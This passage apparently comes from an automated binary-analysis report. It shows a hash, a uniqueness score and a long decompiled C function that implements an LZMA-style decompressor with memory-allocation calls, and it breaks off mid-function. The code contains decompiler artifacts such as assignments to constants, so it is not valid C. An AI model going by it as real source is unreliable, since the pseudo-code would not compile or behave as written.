                                        • Instruction Fuzzy Hash: 69A14271E00229DBDF28CFA8C8446ADBBB1FF44305F15842AD916BB281C7789A96DF44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 98%
                                        			E00406C9C() {
                                        				void _t533;
                                        				signed int _t534;
                                        				signed int _t535;
                                        				signed int* _t605;
                                        				void* _t612;
                                        
                                        				L0:
                                        				while(1) {
                                        					L0:
                                        					if( *(_t612 - 0x40) != 0) {
                                        						 *(_t612 - 0x84) = 0x13;
                                        						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                        						goto L132;
                                        					} else {
                                        						__eax =  *(__ebp - 0x4c);
                                        						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                        						__ecx =  *(__ebp - 0x58);
                                        						__eax =  *(__ebp - 0x4c) << 4;
                                        						__eax =  *(__ebp - 0x58) + __eax + 4;
                                        						L130:
                                        						 *(__ebp - 0x58) = __eax;
                                        						 *(__ebp - 0x40) = 3;
                                        						L144:
                                        						 *(__ebp - 0x7c) = 0x14;
                                        						L145:
                                        						__eax =  *(__ebp - 0x40);
                                        						 *(__ebp - 0x50) = 1;
                                        						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                        						L149:
                                        						if( *(__ebp - 0x48) <= 0) {
                                        							__ecx =  *(__ebp - 0x40);
                                        							__ebx =  *(__ebp - 0x50);
                                        							0 = 1;
                                        							__eax = 1 << __cl;
                                        							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                        							__eax =  *(__ebp - 0x7c);
                                        							 *(__ebp - 0x44) = __ebx;
                                        							while(1) {
                                        								L140:
                                        								 *(_t612 - 0x88) = _t533;
                                        								while(1) {
                                        									L1:
                                        									_t534 =  *(_t612 - 0x88);
                                        									if(_t534 > 0x1c) {
                                        										break;
                                        									}
                                        									switch( *((intOrPtr*)(_t534 * 4 +  &M00406F09))) {
                                        										case 0:
                                        											if( *(_t612 - 0x6c) == 0) {
                                        												goto L170;
                                        											}
                                        											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                        											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                        											_t534 =  *( *(_t612 - 0x70));
                                        											if(_t534 > 0xe1) {
                                        												goto L171;
                                        											}
                                        											_t538 = _t534 & 0x000000ff;
                                        											_push(0x2d);
                                        											asm("cdq");
                                        											_pop(_t569);
                                        											_push(9);
                                        											_pop(_t570);
                                        											_t608 = _t538 / _t569;
                                        											_t540 = _t538 % _t569 & 0x000000ff;
                                        											asm("cdq");
                                        											_t603 = _t540 % _t570 & 0x000000ff;
                                        											 *(_t612 - 0x3c) = _t603;
                                        											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                        											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                        											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                        											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                        												L10:
                                        												if(_t611 == 0) {
                                        													L12:
                                        													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                        													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                        													goto L15;
                                        												} else {
                                        													goto L11;
                                        												}
                                        												do {
                                        													L11:
                                        													_t611 = _t611 - 1;
                                        													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                        												} while (_t611 != 0);
                                        												goto L12;
                                        											}
                                        											if( *(_t612 - 4) != 0) {
                                        												GlobalFree( *(_t612 - 4)); // executed
                                        											}
                                        											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                        											 *(_t612 - 4) = _t534;
                                        											if(_t534 == 0) {
                                        												goto L171;
                                        											} else {
                                        												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                        												goto L10;
                                        											}
                                        										case 1:
                                        											L13:
                                        											__eflags =  *(_t612 - 0x6c);
                                        											if( *(_t612 - 0x6c) == 0) {
                                        												 *(_t612 - 0x88) = 1;
                                        												goto L170;
                                        											}
                                        											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                        											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                        											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                        											_t45 = _t612 - 0x48;
                                        											 *_t45 =  *(_t612 - 0x48) + 1;
                                        											__eflags =  *_t45;
                                        											L15:
                                        											if( *(_t612 - 0x48) < 4) {
                                        												goto L13;
                                        											}
                                        											_t546 =  *(_t612 - 0x40);
                                        											if(_t546 ==  *(_t612 - 0x74)) {
                                        												L20:
                                        												 *(_t612 - 0x48) = 5;
                                        												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                        												goto L23;
                                        											}
                                        											 *(_t612 - 0x74) = _t546;
                                        											if( *(_t612 - 8) != 0) {
                                        												GlobalFree( *(_t612 - 8)); // executed
                                        											}
                                        											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                        											 *(_t612 - 8) = _t534;
                                        											if(_t534 == 0) {
                                        												goto L171;
                                        											} else {
                                        												goto L20;
                                        											}
                                        										case 2:
                                        											L24:
                                        											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                        											 *(_t612 - 0x84) = 6;
                                        											 *(_t612 - 0x4c) = _t553;
                                        											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                        											goto L132;
                                        										case 3:
                                        											L21:
                                        											__eflags =  *(_t612 - 0x6c);
                                        											if( *(_t612 - 0x6c) == 0) {
                                        												 *(_t612 - 0x88) = 3;
                                        												goto L170;
                                        											}
                                        											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                        											_t67 = _t612 - 0x70;
                                        											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                        											__eflags =  *_t67;
                                        											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                        											L23:
                                        											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                        											if( *(_t612 - 0x48) != 0) {
                                        												goto L21;
                                        											}
                                        											goto L24;
                                        										case 4:
                                        											L133:
                                        											_t531 =  *_t605;
                                        											_t588 = _t531 & 0x0000ffff;
                                        											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                        											if( *(_t612 - 0xc) >= _t564) {
                                        												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                        												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                        												 *(_t612 - 0x40) = 1;
                                        												_t532 = _t531 - (_t531 >> 5);
                                        												__eflags = _t532;
                                        												 *_t605 = _t532;
                                        											} else {
                                        												 *(_t612 - 0x10) = _t564;
                                        												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                        												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                        											}
                                        											if( *(_t612 - 0x10) >= 0x1000000) {
                                        												goto L139;
                                        											} else {
                                        												goto L137;
                                        											}
                                        										case 5:
                                        											L137:
                                        											if( *(_t612 - 0x6c) == 0) {
                                        												 *(_t612 - 0x88) = 5;
                                        												goto L170;
                                        											}
                                        											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                        											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                        											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                        											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                        											L139:
                                        											_t533 =  *(_t612 - 0x84);
                                        											goto L140;
                                        										case 6:
                                        											__edx = 0;
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												__eax =  *(__ebp - 4);
                                        												__ecx =  *(__ebp - 0x38);
                                        												 *(__ebp - 0x34) = 1;
                                        												 *(__ebp - 0x84) = 7;
                                        												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                        												goto L132;
                                        											}
                                        											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                        											__esi =  *(__ebp - 0x60);
                                        											__cl = 8;
                                        											__cl = 8 -  *(__ebp - 0x3c);
                                        											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                        											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                        											__ecx =  *(__ebp - 0x3c);
                                        											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                        											__ecx =  *(__ebp - 4);
                                        											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                        											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                        											__eflags =  *(__ebp - 0x38) - 4;
                                        											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                        											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                        											if( *(__ebp - 0x38) >= 4) {
                                        												__eflags =  *(__ebp - 0x38) - 0xa;
                                        												if( *(__ebp - 0x38) >= 0xa) {
                                        													_t98 = __ebp - 0x38;
                                        													 *_t98 =  *(__ebp - 0x38) - 6;
                                        													__eflags =  *_t98;
                                        												} else {
                                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                        												}
                                        											} else {
                                        												 *(__ebp - 0x38) = 0;
                                        											}
                                        											__eflags =  *(__ebp - 0x34) - __edx;
                                        											if( *(__ebp - 0x34) == __edx) {
                                        												__ebx = 0;
                                        												__ebx = 1;
                                        												goto L61;
                                        											} else {
                                        												__eax =  *(__ebp - 0x14);
                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        												__eflags = __eax -  *(__ebp - 0x74);
                                        												if(__eax >=  *(__ebp - 0x74)) {
                                        													__eax = __eax +  *(__ebp - 0x74);
                                        													__eflags = __eax;
                                        												}
                                        												__ecx =  *(__ebp - 8);
                                        												__ebx = 0;
                                        												__ebx = 1;
                                        												__al =  *((intOrPtr*)(__eax + __ecx));
                                        												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                        												goto L41;
                                        											}
                                        										case 7:
                                        											__eflags =  *(__ebp - 0x40) - 1;
                                        											if( *(__ebp - 0x40) != 1) {
                                        												__eax =  *(__ebp - 0x24);
                                        												 *(__ebp - 0x80) = 0x16;
                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                        												__eax =  *(__ebp - 0x28);
                                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                        												__eax =  *(__ebp - 0x2c);
                                        												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                        												__eax = 0;
                                        												__eflags =  *(__ebp - 0x38) - 7;
                                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                        												__al = __al & 0x000000fd;
                                        												__eax = (__eflags >= 0) - 1 + 0xa;
                                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                        												__eax =  *(__ebp - 4);
                                        												__eax =  *(__ebp - 4) + 0x664;
                                        												__eflags = __eax;
                                        												 *(__ebp - 0x58) = __eax;
                                        												goto L69;
                                        											}
                                        											__eax =  *(__ebp - 4);
                                        											__ecx =  *(__ebp - 0x38);
                                        											 *(__ebp - 0x84) = 8;
                                        											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                        											goto L132;
                                        										case 8:
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												__eax =  *(__ebp - 4);
                                        												__ecx =  *(__ebp - 0x38);
                                        												 *(__ebp - 0x84) = 0xa;
                                        												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                        											} else {
                                        												__eax =  *(__ebp - 0x38);
                                        												__ecx =  *(__ebp - 4);
                                        												__eax =  *(__ebp - 0x38) + 0xf;
                                        												 *(__ebp - 0x84) = 9;
                                        												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                        												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                        											}
                                        											goto L132;
                                        										case 9:
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												goto L90;
                                        											}
                                        											__eflags =  *(__ebp - 0x60);
                                        											if( *(__ebp - 0x60) == 0) {
                                        												goto L171;
                                        											}
                                        											__eax = 0;
                                        											__eflags =  *(__ebp - 0x38) - 7;
                                        											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                        											__eflags = _t259;
                                        											0 | _t259 = _t259 + _t259 + 9;
                                        											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                        											goto L76;
                                        										case 0xa:
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												__eax =  *(__ebp - 4);
                                        												__ecx =  *(__ebp - 0x38);
                                        												 *(__ebp - 0x84) = 0xb;
                                        												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                        												goto L132;
                                        											}
                                        											__eax =  *(__ebp - 0x28);
                                        											goto L89;
                                        										case 0xb:
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												__ecx =  *(__ebp - 0x24);
                                        												__eax =  *(__ebp - 0x20);
                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                        											} else {
                                        												__eax =  *(__ebp - 0x24);
                                        											}
                                        											__ecx =  *(__ebp - 0x28);
                                        											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                        											L89:
                                        											__ecx =  *(__ebp - 0x2c);
                                        											 *(__ebp - 0x2c) = __eax;
                                        											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                        											L90:
                                        											__eax =  *(__ebp - 4);
                                        											 *(__ebp - 0x80) = 0x15;
                                        											__eax =  *(__ebp - 4) + 0xa68;
                                        											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                        											goto L69;
                                        										case 0xc:
                                        											L100:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												 *(__ebp - 0x88) = 0xc;
                                        												goto L170;
                                        											}
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t335 = __ebp - 0x70;
                                        											 *_t335 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t335;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											__eax =  *(__ebp - 0x2c);
                                        											goto L102;
                                        										case 0xd:
                                        											L37:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												 *(__ebp - 0x88) = 0xd;
                                        												goto L170;
                                        											}
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t122 = __ebp - 0x70;
                                        											 *_t122 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t122;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											L39:
                                        											__eax =  *(__ebp - 0x40);
                                        											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                        												goto L48;
                                        											}
                                        											__eflags = __ebx - 0x100;
                                        											if(__ebx >= 0x100) {
                                        												goto L54;
                                        											}
                                        											L41:
                                        											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                        											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                        											__ecx =  *(__ebp - 0x58);
                                        											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                        											 *(__ebp - 0x48) = __eax;
                                        											__eax = __eax + 1;
                                        											__eax = __eax << 8;
                                        											__eax = __eax + __ebx;
                                        											__esi =  *(__ebp - 0x58) + __eax * 2;
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        											__ax =  *__esi;
                                        											 *(__ebp - 0x54) = __esi;
                                        											__edx = __ax & 0x0000ffff;
                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                        											if( *(__ebp - 0xc) >= __ecx) {
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        												__cx = __ax;
                                        												 *(__ebp - 0x40) = 1;
                                        												__cx = __ax >> 5;
                                        												__eflags = __eax;
                                        												__ebx = __ebx + __ebx + 1;
                                        												 *__esi = __ax;
                                        											} else {
                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                        												 *(__ebp - 0x10) = __ecx;
                                        												0x800 = 0x800 - __edx;
                                        												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                        												__ebx = __ebx + __ebx;
                                        												 *__esi = __cx;
                                        											}
                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        											 *(__ebp - 0x44) = __ebx;
                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                        												goto L39;
                                        											} else {
                                        												goto L37;
                                        											}
                                        										case 0xe:
                                        											L46:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												 *(__ebp - 0x88) = 0xe;
                                        												goto L170;
                                        											}
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t156 = __ebp - 0x70;
                                        											 *_t156 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t156;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											while(1) {
                                        												L48:
                                        												__eflags = __ebx - 0x100;
                                        												if(__ebx >= 0x100) {
                                        													break;
                                        												}
                                        												__eax =  *(__ebp - 0x58);
                                        												__edx = __ebx + __ebx;
                                        												__ecx =  *(__ebp - 0x10);
                                        												__esi = __edx + __eax;
                                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                                        												__ax =  *__esi;
                                        												 *(__ebp - 0x54) = __esi;
                                        												__edi = __ax & 0x0000ffff;
                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                        												if( *(__ebp - 0xc) >= __ecx) {
                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        													__cx = __ax;
                                        													_t170 = __edx + 1; // 0x1
                                        													__ebx = _t170;
                                        													__cx = __ax >> 5;
                                        													__eflags = __eax;
                                        													 *__esi = __ax;
                                        												} else {
                                        													 *(__ebp - 0x10) = __ecx;
                                        													0x800 = 0x800 - __edi;
                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        													__ebx = __ebx + __ebx;
                                        													 *__esi = __cx;
                                        												}
                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        												 *(__ebp - 0x44) = __ebx;
                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                        													continue;
                                        												} else {
                                        													goto L46;
                                        												}
                                        											}
                                        											L54:
                                        											_t173 = __ebp - 0x34;
                                        											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                        											__eflags =  *_t173;
                                        											goto L55;
                                        										case 0xf:
                                        											L58:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												 *(__ebp - 0x88) = 0xf;
                                        												goto L170;
                                        											}
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t203 = __ebp - 0x70;
                                        											 *_t203 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t203;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											L60:
                                        											__eflags = __ebx - 0x100;
                                        											if(__ebx >= 0x100) {
                                        												L55:
                                        												__al =  *(__ebp - 0x44);
                                        												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                        												goto L56;
                                        											}
                                        											L61:
                                        											__eax =  *(__ebp - 0x58);
                                        											__edx = __ebx + __ebx;
                                        											__ecx =  *(__ebp - 0x10);
                                        											__esi = __edx + __eax;
                                        											__ecx =  *(__ebp - 0x10) >> 0xb;
                                        											__ax =  *__esi;
                                        											 *(__ebp - 0x54) = __esi;
                                        											__edi = __ax & 0x0000ffff;
                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                        											if( *(__ebp - 0xc) >= __ecx) {
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        												__cx = __ax;
                                        												_t217 = __edx + 1; // 0x1
                                        												__ebx = _t217;
                                        												__cx = __ax >> 5;
                                        												__eflags = __eax;
                                        												 *__esi = __ax;
                                        											} else {
                                        												 *(__ebp - 0x10) = __ecx;
                                        												0x800 = 0x800 - __edi;
                                        												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        												__ebx = __ebx + __ebx;
                                        												 *__esi = __cx;
                                        											}
                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        											 *(__ebp - 0x44) = __ebx;
                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                        												goto L60;
                                        											} else {
                                        												goto L58;
                                        											}
                                        										case 0x10:
                                        											L110:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												 *(__ebp - 0x88) = 0x10;
                                        												goto L170;
                                        											}
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t366 = __ebp - 0x70;
                                        											 *_t366 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t366;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											goto L112;
                                        										case 0x11:
                                        											L69:
                                        											__esi =  *(__ebp - 0x58);
                                        											 *(__ebp - 0x84) = 0x12;
                                        											L132:
                                        											 *(_t612 - 0x54) = _t605;
                                        											goto L133;
                                        										case 0x12:
                                        											goto L0;
                                        										case 0x13:
                                        											__eflags =  *(__ebp - 0x40);
                                        											if( *(__ebp - 0x40) != 0) {
                                        												_t469 = __ebp - 0x58;
                                        												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                        												__eflags =  *_t469;
                                        												 *(__ebp - 0x30) = 0x10;
                                        												 *(__ebp - 0x40) = 8;
                                        												goto L144;
                                        											}
                                        											__eax =  *(__ebp - 0x4c);
                                        											__ecx =  *(__ebp - 0x58);
                                        											__eax =  *(__ebp - 0x4c) << 4;
                                        											 *(__ebp - 0x30) = 8;
                                        											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                        											goto L130;
                                        										case 0x14:
                                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                        											__eax =  *(__ebp - 0x80);
                                        											L140:
                                        											 *(_t612 - 0x88) = _t533;
                                        											goto L1;
                                        										case 0x15:
                                        											__eax = 0;
                                        											__eflags =  *(__ebp - 0x38) - 7;
                                        											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                        											__al = __al & 0x000000fd;
                                        											__eax = (__eflags >= 0) - 1 + 0xb;
                                        											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                        											goto L121;
                                        										case 0x16:
                                        											__eax =  *(__ebp - 0x30);
                                        											__eflags = __eax - 4;
                                        											if(__eax >= 4) {
                                        												_push(3);
                                        												_pop(__eax);
                                        											}
                                        											__ecx =  *(__ebp - 4);
                                        											 *(__ebp - 0x40) = 6;
                                        											__eax = __eax << 7;
                                        											 *(__ebp - 0x7c) = 0x19;
                                        											 *(__ebp - 0x58) = __eax;
                                        											goto L145;
                                        										case 0x17:
                                        											goto L145;
                                        										case 0x18:
                                        											L146:
                                        											__eflags =  *(__ebp - 0x6c);
                                        											if( *(__ebp - 0x6c) == 0) {
                                        												 *(__ebp - 0x88) = 0x18;
                                        												goto L170;
                                        											}
                                        											__ecx =  *(__ebp - 0x70);
                                        											__eax =  *(__ebp - 0xc);
                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											_t484 = __ebp - 0x70;
                                        											 *_t484 =  *(__ebp - 0x70) + 1;
                                        											__eflags =  *_t484;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        											L148:
                                        											_t487 = __ebp - 0x48;
                                        											 *_t487 =  *(__ebp - 0x48) - 1;
                                        											__eflags =  *_t487;
                                        											goto L149;
                                        										case 0x19:
                                        											__eflags = __ebx - 4;
                                        											if(__ebx < 4) {
                                        												 *(__ebp - 0x2c) = __ebx;
                                        												L120:
                                        												_t394 = __ebp - 0x2c;
                                        												 *_t394 =  *(__ebp - 0x2c) + 1;
                                        												__eflags =  *_t394;
                                        												L121:
                                        												__eax =  *(__ebp - 0x2c);
                                        												__eflags = __eax;
                                        												if(__eax == 0) {
                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                        													goto L170;
                                        												}
                                        												__eflags = __eax -  *(__ebp - 0x60);
                                        												if(__eax >  *(__ebp - 0x60)) {
                                        													goto L171;
                                        												}
                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                        												__eax =  *(__ebp - 0x30);
                                        												_t401 = __ebp - 0x60;
                                        												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                        												__eflags =  *_t401;
                                        												goto L124;
                                        											}
                                        											__ecx = __ebx;
                                        											__eax = __ebx;
                                        											__ecx = __ebx >> 1;
                                        											__eax = __ebx & 0x00000001;
                                        											__ecx = (__ebx >> 1) - 1;
                                        											__al = __al | 0x00000002;
                                        											__eax = (__ebx & 0x00000001) << __cl;
